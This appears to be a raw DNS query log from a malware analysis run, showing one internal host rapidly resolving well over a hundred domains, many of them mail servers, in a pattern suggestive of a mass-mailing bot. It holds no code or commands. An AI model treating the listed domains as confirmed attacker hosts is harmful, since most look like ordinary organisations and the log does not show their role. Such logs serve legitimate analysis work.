                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.675147057 CET192.168.2.68.8.8.80x37f5Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.679224014 CET192.168.2.68.8.8.80x50f6Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.681236982 CET192.168.2.68.8.8.80x5256Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.066421032 CET192.168.2.68.8.8.80x35e1Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.120137930 CET192.168.2.68.8.8.80x880bStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.263948917 CET192.168.2.68.8.8.80x16e9Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.271194935 CET192.168.2.68.8.8.80x4a45Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.305923939 CET192.168.2.68.8.8.80x5b26Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.306107044 CET192.168.2.68.8.8.80xc1b2Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.317349911 CET192.168.2.68.8.8.80x49edStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.427958965 CET192.168.2.68.8.8.80xa2b2Standard query (0)in1.smtp.messaginguser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.439060926 CET192.168.2.68.8.8.80xf65fStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.452121019 CET192.168.2.68.8.8.80xc9c1Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.573045015 CET192.168.2.68.8.8.80x604Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.600949049 CET192.168.2.68.8.8.80x26a5Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.642570972 CET192.168.2.68.8.8.80x32d9Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.644195080 CET192.168.2.68.8.8.80xb486Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.644715071 CET192.168.2.68.8.8.80xe5c1Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.716582060 CET192.168.2.68.8.8.80xc567Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.742032051 CET192.168.2.68.8.8.80xb78cStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.775655031 CET192.168.2.68.8.8.80x59ebStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.775732040 CET192.168.2.68.8.8.80xc6baStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.784670115 CET192.168.2.68.8.8.80xaf18Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.916569948 CET192.168.2.68.8.8.80xa565Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.926963091 CET192.168.2.68.8.8.80x2b79Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.933605909 CET192.168.2.68.8.8.80x59d1Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.950412989 CET192.168.2.68.8.8.80xa2a6Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.011833906 CET192.168.2.68.8.8.80xa1a8Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.019399881 CET192.168.2.68.8.8.80xc791Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.048605919 CET192.168.2.68.8.8.80xcebaStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.058378935 CET192.168.2.68.8.8.80x2116Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.091519117 CET192.168.2.68.8.8.80xb5eeStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.097762108 CET192.168.2.68.8.8.80x9eb7Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.110322952 CET192.168.2.68.8.8.80xeeb1Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.123063087 CET192.168.2.68.8.8.80xaf1bStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.128760099 CET192.168.2.68.8.8.80x2a30Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.131660938 CET192.168.2.68.8.8.80x25c5Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.213360071 CET192.168.2.68.8.8.80x4adcStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.243069887 CET192.168.2.68.8.8.80xf42aStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.425750971 CET192.168.2.68.8.8.80x5fd2Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.500181913 CET192.168.2.68.8.8.80xacbaStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.502326965 CET192.168.2.68.8.8.80xa87bStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.627341032 CET192.168.2.68.8.8.80xaa99Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.664350986 CET192.168.2.68.8.8.80xdd8cStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.666351080 CET192.168.2.68.8.8.80x34a3Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.667639971 CET192.168.2.68.8.8.80xa24cStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.697680950 CET192.168.2.68.8.8.80x4c41Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.704718113 CET192.168.2.68.8.8.80xe47bStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.713030100 CET192.168.2.68.8.8.80x9980Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.756201982 CET192.168.2.68.8.8.80x72a5Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.097383022 CET192.168.2.68.8.8.80xb0abStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.098654985 CET192.168.2.68.8.8.80x6bebStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.128853083 CET192.168.2.68.8.8.80x1bd9Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.141515017 CET192.168.2.68.8.8.80x425bStandard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.167897940 CET192.168.2.68.8.8.80xdf21Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.171247005 CET192.168.2.68.8.8.80x289bStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.233144999 CET192.168.2.68.8.8.80x5d76Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.312664032 CET192.168.2.68.8.8.80x703eStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.312892914 CET192.168.2.68.8.8.80xacf9Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.358061075 CET192.168.2.68.8.8.80x50fStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.369544983 CET192.168.2.68.8.8.80x6485Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.377340078 CET192.168.2.68.8.8.80x88edStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.427835941 CET192.168.2.68.8.8.80x511bStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.446732044 CET192.168.2.68.8.8.80xd171Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.453860998 CET192.168.2.68.8.8.80xe17Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.454071045 CET192.168.2.68.8.8.80x4f7Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.454480886 CET192.168.2.68.8.8.80x518bStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.518038988 CET192.168.2.68.8.8.80x90e7Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.518882036 CET192.168.2.68.8.8.80x9826Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.522850037 CET192.168.2.68.8.8.80x81e5Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.537560940 CET192.168.2.68.8.8.80xe030Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.666263103 CET192.168.2.68.8.8.80x7e1cStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.677967072 CET192.168.2.68.8.8.80xbbdcStandard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.693677902 CET192.168.2.68.8.8.80x7cf9Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.755418062 CET192.168.2.68.8.8.80x8b79Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.766583920 CET192.168.2.68.8.8.80x426fStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.788831949 CET192.168.2.68.8.8.80x5b8cStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.880140066 CET192.168.2.68.8.8.80x4c41Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.887897015 CET192.168.2.68.8.8.80x5c65Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.981983900 CET192.168.2.68.8.8.80x5351Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.985781908 CET192.168.2.68.8.8.80x1468Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.990550995 CET192.168.2.68.8.8.80x7b95Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.996211052 CET192.168.2.68.8.8.80xe110Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.139348984 CET192.168.2.68.8.8.80x690Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.156145096 CET192.168.2.68.8.8.80x7e8dStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.200714111 CET192.168.2.68.8.8.80x720cStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.255387068 CET192.168.2.68.8.8.80x9cfStandard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.259212971 CET192.168.2.68.8.8.80xc37eStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.373550892 CET192.168.2.68.8.8.80xc67aStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.375222921 CET192.168.2.68.8.8.80xbdf5Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.418884039 CET192.168.2.68.8.8.80xdb44Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.423491955 CET192.168.2.68.8.8.80x4676Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.423568964 CET192.168.2.68.8.8.80xa638Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.432534933 CET192.168.2.68.8.8.80x676fStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.438935041 CET192.168.2.68.8.8.80x88d2Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.444334984 CET192.168.2.68.8.8.80x4124Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.446569920 CET192.168.2.68.8.8.80x7b32Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.782366991 CET192.168.2.68.8.8.80x464Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.936168909 CET192.168.2.68.8.8.80x2860Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.991072893 CET192.168.2.68.8.8.80xf7c8Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.032032013 CET192.168.2.68.8.8.80xa7e4Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.083565950 CET192.168.2.68.8.8.80xea81Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.205029011 CET192.168.2.68.8.8.80xb936Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.225492954 CET192.168.2.68.8.8.80xf8fStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.270915031 CET192.168.2.68.8.8.80x57f7Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.299278021 CET192.168.2.68.8.8.80x2159Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.299628019 CET192.168.2.68.8.8.80x266fStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.300420046 CET192.168.2.68.8.8.80xc794Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.300698042 CET192.168.2.68.8.8.80x18ebStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.301414013 CET192.168.2.68.8.8.80xaf50Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.307600975 CET192.168.2.68.8.8.80xbcc1Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.307743073 CET192.168.2.68.8.8.80x5835Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.311527014 CET192.168.2.68.8.8.80xd557Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.641937017 CET192.168.2.68.8.8.80xb092Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.642834902 CET192.168.2.68.8.8.80x8515Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.658046961 CET192.168.2.68.8.8.80x1e3cStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.677879095 CET192.168.2.68.8.8.80x5405Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.689481020 CET192.168.2.68.8.8.80x8d09Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.691898108 CET192.168.2.68.8.8.80xbeabStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.700503111 CET192.168.2.68.8.8.80xedc9Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.704010010 CET192.168.2.68.8.8.80x8db1Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.705279112 CET192.168.2.68.8.8.80xa632Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.760344028 CET192.168.2.68.8.8.80xdb44Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.819185019 CET192.168.2.68.8.8.80x4c41Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.910939932 CET192.168.2.68.8.8.80x1676Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.914230108 CET192.168.2.68.8.8.80x6e38Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.917741060 CET192.168.2.68.8.8.80xbc2aStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.919471979 CET192.168.2.68.8.8.80x7f95Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.954808950 CET192.168.2.68.8.8.80x1a7bStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.954938889 CET192.168.2.68.8.8.80x7dabStandard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:53.969912052 CET192.168.2.68.8.8.80x3ed1Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.047261953 CET192.168.2.68.8.8.80xdd37Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.120831013 CET192.168.2.68.8.8.80x59e6Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.164521933 CET192.168.2.68.8.8.80x228aStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.164899111 CET192.168.2.68.8.8.80x45e1Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.174113035 CET192.168.2.68.8.8.80x293eStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.174547911 CET192.168.2.6192.203.230.100x49Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.182782888 CET192.168.2.68.8.8.80xf59bStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.196433067 CET192.168.2.6198.41.0.40x1fStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.213898897 CET192.168.2.6198.32.64.120x8dStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.258061886 CET192.168.2.68.8.8.80xf3c7Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.270899057 CET192.168.2.68.8.8.80x1683Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.276568890 CET192.168.2.68.8.8.80xa5dStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.484636068 CET192.168.2.68.8.8.80x7564Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.539904118 CET192.168.2.68.8.8.80xec67Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.552774906 CET192.168.2.68.8.8.80xe619Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.554944038 CET192.168.2.68.8.8.80x59feStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.632047892 CET192.168.2.68.8.8.80x7d72Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.777587891 CET192.168.2.68.8.8.80x6387Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.844616890 CET192.168.2.68.8.8.80x1ddeStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.881994009 CET192.168.2.68.8.8.80x4328Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.897176981 CET192.168.2.68.8.8.80x7d13Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.899626017 CET192.168.2.68.8.8.80x4c96Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.901014090 CET192.168.2.68.8.8.80xb999Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:54.915721893 CET192.168.2.68.8.8.80xc995Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.076387882 CET192.168.2.68.8.8.80x8cfcStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.108575106 CET192.168.2.68.8.8.80x24dStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.171389103 CET192.168.2.68.8.8.80x189eStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.172935963 CET192.168.2.68.8.8.80xe4c9Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.176908016 CET192.168.2.68.8.8.80x42beStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.240401983 CET192.168.2.68.8.8.80xcbfdStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.253102064 CET192.168.2.68.8.8.80xd0c0Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.258078098 CET192.168.2.68.8.8.80x28d8Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.262006998 CET192.168.2.68.8.8.80xc233Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.265970945 CET192.168.2.68.8.8.80x91c8Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.267797947 CET192.168.2.68.8.8.80x3efaStandard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.315570116 CET192.168.2.68.8.8.80xc38bStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.326344967 CET192.168.2.68.8.8.80xcd98Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.352149010 CET192.168.2.68.8.8.80x1863Standard query (0)in1.smtp.messaginguser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.354729891 CET192.168.2.68.8.8.80xed30Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.354922056 CET192.168.2.68.8.8.80x4fedStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.366080999 CET192.168.2.68.8.8.80x292cStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.369545937 CET192.168.2.68.8.8.80x6809Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.376470089 CET192.168.2.68.8.8.80x50a4Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.376739979 CET192.168.2.68.8.8.80xf54cStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.376789093 CET192.168.2.68.8.8.80x857aStandard query (0)redgiga.comA (IP address)IN (0x0001)false
